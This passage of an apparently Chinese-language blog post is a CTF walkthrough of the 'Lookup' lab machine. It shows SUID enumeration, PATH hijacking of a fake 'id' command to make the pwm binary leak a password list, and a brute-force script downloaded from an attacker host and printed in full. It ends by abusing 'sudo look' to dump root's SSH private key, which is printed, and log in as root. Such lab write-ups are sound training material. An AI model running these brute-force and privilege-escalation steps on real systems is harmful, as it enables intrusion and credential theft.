www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/usr\/bin\/bash\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nthink:x:1000:1000:,,,:\/home\/think:\/bin\/bash\nfwupd-refresh:x:113:117:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\n(remote) www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ ls \/home\nthink\n(remote) www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ cd \/home\/think\n(remote) www-data@lookup:\/home\/think$ ls -la\ntotal 40\ndrwxr-xr-x 5 think think 4096 Jan 11  2024 .\ndrwxr-xr-x 3 root  root  4096 Jun  2  2023 ..\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout\n-rwxr-xr-x 1 think think 3771 Jun  2  2023 .bashrc\ndrwxr-xr-x 2 think think 4096 Jun 21  2023 .cache\ndrwx------ 3 think think 4096 Aug  9  2023 .gnupg\n-rw-r----- 1 root  think  525 Jul 30  2023 .passwords\n-rwxr-xr-x 1 think think  807 Jun  2  2023 .profile\ndrw-r----- 2 think think 4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -&gt; \/dev\/null\n-rw-r----- 1 root  think   33 Jul 30  2023 user.txt\n(remote) www-data@lookup:\/home\/think$ sudo -l\n[sudo] password for www-data: \n^C\n(remote) www-data@lookup:\/tmp$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/snapd\/19457\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1950\/usr\/bin\/chfn\n\/snap\/core20\/1950\/usr\/bin\/chsh\n\/snap\/core20\/1950\/usr\/bin\/gpasswd\n\/snap\/core20\/1950\/usr\/bin\/mount\n\/snap\/core20\/1950\/usr\/bin\/newgrp\n\/snap\/core20\/1950\/usr\/bin\/passwd\n\/snap\/core20\/1950\/usr\/bin\/su\n\/snap\/core20\/1950\/usr\/bin\/sudo\n\/snap\/core20\/1950\/usr\/bin\/umount\n\/snap\/core20\/1950\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1950\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pwm\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n(remote) www-data@lookup:\/tmp$ ls -la \/usr\/sbin\/pwm\n-rwsr-sr-x 1 root root 17176 Jan 11  2024 \/usr\/sbin\/pwm<\/code><\/pre>\n<p>\u5f00\u4e00\u4e0bpspy\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906962.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906962.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923181408964\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u518d\u4e0a\u4f20<code>linpeas.sh<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906963.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906963.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923182027443\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/tmp$ find \/ -group think -type f 2&gt;\/dev\/null\n\/home\/think\/.cache\/motd.legal-displayed\n\/home\/think\/.profile\n\/home\/think\/.bashrc\n\/home\/think\/.passwords\n\/home\/think\/.bash_logout\n\/home\/think\/user.txt\n\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/snap\/core20\/1950\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1974\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\n(remote) www-data@lookup:\/$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n[!] ID: www-data\n[-] File \/home\/www-data\/.passwords not found<\/code><\/pre>\n<h3>\u52ab\u6301\u73af\u5883\u53d8\u91cf\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/home$ whereis id\nid: \/usr\/bin\/id \/usr\/share\/man\/man1\/id.1.gz\n(remote) www-data@lookup:\/home$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n(remote) www-data@lookup:\/home$ cd \/tmp\n(remote) www-data@lookup:\/tmp$ id      \nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@lookup:\/tmp$ id think \nuid=1000(think) gid=1000(think) groups=1000(think)\n(remote) www-data@lookup:\/tmp$ echo &#039;1000&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ chmod +x id\n(remote) www-data@lookup:\/tmp$ PATH=$PWD:$PATH\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: 1000: not found\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ echo &#039;uid=1000(think)&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: Syntax error: &quot;(&quot; unexpected\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ cat id\nuid=1000(think)\n(remote) www-data@lookup:\/tmp$ echo &#039;uid=1000(think) gid=1000(think) groups=1000(think)&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: Syntax error: &quot;(&quot; unexpected\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ id           \n\/tmp\/id: line 1: syntax error near unexpected token `(&#039;\n\/tmp\/id: line 1: `uid=1000(think) gid=1000(think) groups=1000(think)&#039;\n(remote) www-data@lookup:\/tmp$ echo &#039;echo &quot;uid=1000(think) gid=1000(think) groups=1000(think)&quot;&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ id\nuid=1000(think) gid=1000(think) groups=1000(think)\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n[!] ID: think\njose1006\njose1004\njose1002\njose1001teles\njose100190\njose10001\njose10.asd\njose10+\njose0_07\njose0990\njose0986$\njose098130443\njose0981\njose0924\njose0923\njose0921\nthepassword\njose(1993)\njose&#039;sbabygurl\njose&amp;vane\njose&amp;takie\njose&amp;samantha\njose&amp;pam\njose&amp;jlo\njose&amp;jessica\njose&amp;jessi\njosemario.AKA(think)\njose.medina.\njose.mar\njose.luis.24.oct\njose.line\njose.leonardo100\njose.leas.30\njose.ivan\njose.i22\njose.hm\njose.hater\njose.fa\njose.f\njose.dont\njose.d\njose.com}\njose.com\njose.chepe_06\njose.a91\njose.a\njose.96.\njose.9298\njose.2856171<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd9\u4e9b\u5bc6\u7801\u8fdb\u884c\u7206\u7834\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm &gt; pass.txt\n(remote) www-data@lookup:\/tmp$ wget http:\/\/192.168.10.102:8888\/suBF.sh\n(remote) www-data@lookup:\/tmp$ chmod +x suBF.sh \n(remote) www-data@lookup:\/tmp$ cat suBF.sh \n#!\/bin\/bash\n\nhelp=&quot;This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).\nYou can specify a username using -u &lt;username&gt; and a wordlist via -w &lt;wordlist&gt;.\nBy default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete\nYou can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).\nFastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete\n\nExample:    .\/suBF.sh -u &lt;USERNAME&gt; [-w top12000.txt] [-t 0.7] [-s 0.007]\n\nTHE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL\\n\\n&quot;\n\nWORDLIST=&quot;top12000.txt&quot;\nUSER=&quot;&quot;\nTIMEOUTPROC=&quot;0.7&quot;\nSLEEPPROC=&quot;0.007&quot;\nwhile getopts &quot;h?u:t:s:w:&quot; opt; do\n  case &quot;$opt&quot; in\n    h|\\?) printf &quot;$help&quot;; exit 0;;\n    u)  USER=$OPTARG;;\n    t)  TIMEOUTPROC=$OPTARG;;\n    s)  SLEEPPROC=$OPTARG;;\n    w)  WORDLIST=$OPTARG;;\n    esac\ndone\n\nif ! [ &quot;$USER&quot; ]; then printf &quot;$help&quot;; exit 0; fi\n\nif ! [[ -p \/dev\/stdin ]] &amp;&amp; ! [ $WORDLIST = &quot;-&quot; ] &amp;&amp; ! [ -f &quot;$WORDLIST&quot; ]; then echo &quot;Wordlist ($WORDLIST) not found!&quot;; exit 0; fi\n\nC=$(printf &#039;\\033&#039;)\n\nsu_try_pwd (){\n  USER=$1\n  PASSWORDTRY=$2\n  trysu=`echo &quot;$PASSWORDTRY&quot; | timeout $TIMEOUTPROC su $USER -c whoami 2&gt;\/dev\/null` \n  if [ &quot;$trysu&quot; ]; then\n    echo &quot;  You can login as $USER using password: $PASSWORDTRY&quot; | sed &quot;s,.*,${C}[1;31;103m&amp;${C}[0m,&quot;\n    exit 0;\n  fi\n}\n\nsu_brute_user_num (){\n  echo &quot;  [+] Bruteforcing $1...&quot;\n  USER=$1\n  su_try_pwd $USER &quot;&quot; &amp;    #Try without password\n  su_try_pwd $USER $USER &amp; #Try username as password\n  su_try_pwd $USER `echo $USER | rev 2&gt;\/dev\/null` &amp;     #Try reverse username as password\n\n  if ! [[ -p \/dev\/stdin ]] &amp;&amp; [ -f &quot;$WORDLIST&quot; ]; then\n    while IFS=&#039;&#039; read -r P || [ -n &quot;${P}&quot; ]; do # Loop through wordlist file   \n      su_try_pwd $USER $P &amp; #Try TOP TRIES of passwords (by default 2000)\n      sleep $SLEEPPROC # To not overload the system\n    done &lt; $WORDLIST\n\n  else\n    cat - | while read line; do\n      su_try_pwd $USER $line &amp; #Try TOP TRIES of passwords (by default 2000)    \n      sleep $SLEEPPROC # To not overload the system\n    done\n  fi\n  wait\n}\n\nsu_brute_user_num $USER\necho &quot;  Wordlist exhausted&quot; | sed &quot;s,.*,${C}[1;31;107m&amp;${C}[0m,&quot;\n(remote) www-data@lookup:\/tmp$ .\/suBF.sh -u think -w pass.txt \n  [+] Bruteforcing think...\n  You can login as think using password: josemario.AKA(think)\n  Wordlist exhausted<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906964.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906964.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923190246582\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>look\u63d0\u6743\u81f3root<\/h3>\n<pre><code class=\"language-bash\">think@lookup:~$ ls -la\ntotal 40\ndrwxr-xr-x 5 think think 4096 Jan 11  2024 .\ndrwxr-xr-x 3 root  root  4096 Jun  2  2023 ..\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout\n-rwxr-xr-x 1 think think 3771 Jun  2  2023 .bashrc\ndrwxr-xr-x 2 think think 4096 Jun 21  2023 .cache\ndrwx------ 3 think think 4096 Aug  9  2023 .gnupg\n-rw-r----- 1 root  think  525 Jul 30  2023 .passwords\n-rwxr-xr-x 1 think think  807 Jun  2  2023 .profile\ndrw-r----- 2 think think 4096 Jun 21  2023 .ssh\n-rw-r----- 1 root  think   33 Jul 30  2023 user.txt\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -&gt; \/dev\/null\nthink@lookup:~$ cat .passwords \njose1006\njose1004\njose1002\njose1001teles\njose100190\njose10001\njose10.asd\njose10+\njose0_07\njose0990\njose0986$\njose098130443\njose0981\njose0924\njose0923\njose0921\nthepassword\njose(1993)\njose&#039;sbabygurl\njose&amp;vane\njose&amp;takie\njose&amp;samantha\njose&amp;pam\njose&amp;jlo\njose&amp;jessica\njose&amp;jessi\njosemario.AKA(think)\njose.medina.\njose.mar\njose.luis.24.oct\njose.line\njose.leonardo100\njose.leas.30\njose.ivan\njose.i22\njose.hm\njose.hater\njose.fa\njose.f\njose.dont\njose.d\njose.com}\njose.com\njose.chepe_06\njose.a91\njose.a\njose.96.\njose.9298\njose.2856171\nthink@lookup:~$ cat user.txt \n38375fb4dd8baa2b2039ac03d92b820e\nthink@lookup:~$ sudo -l\n[sudo] password for think: \nMatching Defaults entries for think on lookup:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser think may run the following commands on lookup:\n    (ALL) \/usr\/bin\/look\nthink@lookup:~$ \/usr\/bin\/look\nusage: look [-bdf] [-t char] string [file ...]\nthink@lookup:~$ sudo look &#039;&#039; &quot;\/root\/.ssh\/id_rsa&quot;\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf\/h23TCH7qKRg4Penlti9RKW2XLSB5wR\nQcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM\/zDb\/\/ZlnlwCwKQ5XyTQU\/vHfROfU0pnR\nj7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR\/+ybAIVbB+ya\/D5r9DYPmatUTLlHD\nbV55xi6YcfV7rjbOpjRj8hgubYgjL26BwszbaHKSkI+NcVNPmgquy5Xw8gh3XciFhNLqmd\nISF9fxn5i1vQDB318owoPPZB1rIuMPH3C0SIno42FiqFO\/fb1\/wPHGasBmLzZF6Fr8\/EHC\n4wRj9tqsMZfD8xkk2FACtmAFH90ZHXg5D+pwujPDQAuULODP8Koj4vaMKu2CgH3+8I3xRM\nhufqHa1+Qe3Hu++7qISEWFHgzpRMFtjPFJEGRzzh2x8F+wozctvn3tcHRv321W5WJGgzhd\nk5ECnuu8Jzpg25PEPKrvYf+lMUQebQSncpcrffr9AAAFiJB\/j92Qf4\/dAAAAB3NzaC1yc2\nEAAAGBAKbZtvg4qVX1DGPu4PS3Jn\/4dt0wh+6ikYOD3p5bYvUSltly0gecEUHKstc0RQyr\nUUBoX06vmH1X26CQTwnyh3aUKjP8w2\/\/2ZZ5cAsCkOV8k0FP7x30Tn1NKZ0Y+3iKcOdCez\nxjzRu0QIGz+bSdjXLBWAIn5sTKyT1Uf\/smwCFWwfsmvw+a\/Q2D5mrVEy5Rw21eecYumHH1\ne642zqY0Y\/IYLm2IIy9ugcLM22hykpCPjXFTT5oKrsuV8PIId13IhYTS6pnSEhfX8Z+Ytb\n0Awd9fKMKDz2QdayLjDx9wtEiJ6ONhYqhTv329f8DxxmrAZi82Reha\/PxBwuMEY\/barDGX\nw\/MZJNhQArZgBR\/dGR14OQ\/qcLozw0ALlCzgz\/CqI+L2jCrtgoB9\/vCN8UTIbn6h2tfkHt\nx7vvu6iEhFhR4M6UTBbYzxSRBkc84dsfBfsKM3Lb597XB0b99tVuViRoM4XZORAp7rvCc6\nYNuTxDyq72H\/pTFEHm0Ep3KXK336\/QAAAAMBAAEAAAGBAJ4t2wO6G\/eMyIFZL1Vw6QP7Vx\nzdbJE0+AUZmIzCkK9MP0zJSQrDz6xy8VeKi0e2huIr0Oc1G7kA+QtgpD4G+pvVXalJoTLl\n+K9qU2lstleJ4cTSdhwMx\/iMlb4EuCsP\/HeSFGktKH9yRJFyQXIUx8uaNshcca\/xnBUTrf\n05QH6a1G44znuJ8QvGF0UC2htYkpB2N7ZF6GppUybXeNQi6PnUKPfYT5shBc3bDssXi5GX\nNn3QgK\/GHu6NKQ8cLaXwefRUD6NBOERQtwTwQtQN+n\/xIs77kmvCyYOxzyzgWoS2zkhXUz\nYZyzk8d2PahjPmWcGW3j3AU3A3ncHd7ga8K9zdyoyp6nCF+VF96DpZSpS2Oca3T8yltaR1\n1fkofhBy75ijNQTXUHhAwuDaN5\/zGfO+HS6iQ1YWYiXVZzPsktV4kFpKkUMklC9VjlFjPi\nt1zMCGVDXu2qgfoxwsxRwknKUt75osVPN9HNAU3LVqviencqvNkyPX9WXpb+z7GUf7FQAA\nAMEAytl5PGb1fSnUYB2Q+GKyEk\/SGmRdzV07LiF9FgHMCsEJEenk6rArffc2FaltHYQ\/Hz\nw\/GnQakUjYQTNnUIUqcxC59SvbfAKf6nbpYHzjmWxXnOvkoJ7cYZ\/sYo5y2Ynt2QcjeFxn\nvD9I8ACJBVQ8LYUffvuQUHYTTkQO1TnptZeWX7IQml0SgvucgXdLekMNu6aqIh71AoZYCj\nrirB3Y5jjhhzwgIK7GNQ7oUe9GsErmZjD4c4KueznC5r+tQXu3AAAAwQDWGTkRzOeKRxE\/\nC6vFoWfAj3PbqlUmS6clPOYg3Mi3PTf3HyooQiSC2T7pK82NBDUQjicTSsZcvVK38vKm06\nK6fle+0TgQyUjQWJjJCdHwhqph\/\/UKYoycotdP+nBin4x988i1W3lPXzP3vNdFEn5nXd10\n5qIRkVl1JvJEvrjOd+0N2yYpQOE3Qura055oA59h7u+PnptyCh5Y8g7O+yfLdw3TzZlR5T\nDJC9mqI25np\/PtAKNBEuDGDGmOnzdU47sAAADBAMeBRAhIS+rM\/ZuxZL54t\/YL3UwEuQis\nsJP2G3w1YK7270zGWmm1LlbavbIX4k0u\/V1VIjZnWWimncpl+Lhj8qeqwdoAsCv1IHjfVF\ndhIPjNOOghtbrg0vvARsMSX5FEgJxlo\/FTw54p7OmkKMDJREctLQTJC0jRRRXhEpxw51cL\n3qXILoUzSmRum2r6eTHXVZbbX2NCBj7uH2PUgpzso9m7qdf7nb7BKkR585f4pUuI01pUD0\nDgTNYOtefYf4OEpwAAABFyb290QHVidW50dXNlcnZlcg==\n-----END OPENSSH PRIVATE KEY-----\nthink@lookup:~$ sudo look &#039;&#039; &quot;\/root\/.ssh\/id_rsa&quot; &gt; \/tmp\/root;chmod 600 \/tmp\/root\nthink@lookup:~$ ssh 0.0.0.0 -i \/tmp\/root\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:hCU4CBHGs0axyMgyDsZBy1GHRljqponOxB4rQDOUOzA.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nFailed to add the host to the list of known hosts (\/home\/think\/.ssh\/known_hosts).\nthink@0.0.0.0&#039;s password: \n\nthink@lookup:~$ ssh root@0.0.0.0 -i \/tmp\/root\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:hCU4CBHGs0axyMgyDsZBy1GHRljqponOxB4rQDOUOzA.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nFailed to add the host to the list of known hosts (\/home\/think\/.ssh\/known_hosts).\nWelcome to Ubuntu 20.04.6 LTS (GNU\/Linux 5.4.0-156-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Mon 23 Sep 2024 11:04:45 AM UTC\n\n  System load:              0.03\n  Usage of \/:               62.5% of 9.75GB\n  Memory usage:             43%\n  Swap usage:               0%\n  Processes:                211\n  Users logged in:          0\n  IPv4 address for enp0s17: 192.168.10.101\n  IPv6 address for enp0s17: fd00:4c10:d50a:f900:a00:27ff:fefd:3131\n\n  =&gt; There are 2 zombie processes.\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n\n7 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Wed Sep 11 09:24:50 2024\nroot@lookup:~$ <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906965.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906965.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923190600859\" style=\"zoom: 50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lookup \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-814","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=814"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814\/revisions"}],"predecessor-version":[{"id":815,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814\/revisions\/815"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=814"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}